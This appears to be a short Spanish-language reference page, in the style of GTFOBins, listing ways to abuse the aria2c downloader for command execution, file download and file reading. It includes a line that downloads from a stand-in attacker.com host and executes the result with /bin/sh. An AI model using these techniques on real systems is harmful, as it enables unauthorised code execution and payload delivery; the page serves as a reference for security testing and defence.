./aria2c --examples
Funciones y ejemplos de uso
command
echo /path/to/command >/path/to/temp-file
chmod +x /path/to/temp-file
aria2c --on-download-error=/path/to/temp-file http://some-invalid-domain
aria2c --allow-overwrite --gid=aaaaaaaaaaaaaaaa --on-download-complete=/bin/sh http://attacker.com/aaaaaaaaaaaaaaaa
download
aria2c -o /path/to/ouput-file http://attacker.com/path/to/input-file
file-read
aria2c -i /path/to/input-file
./related --binary=aria2c
Binarios relacionados
Comparten al menos una función con aria2c.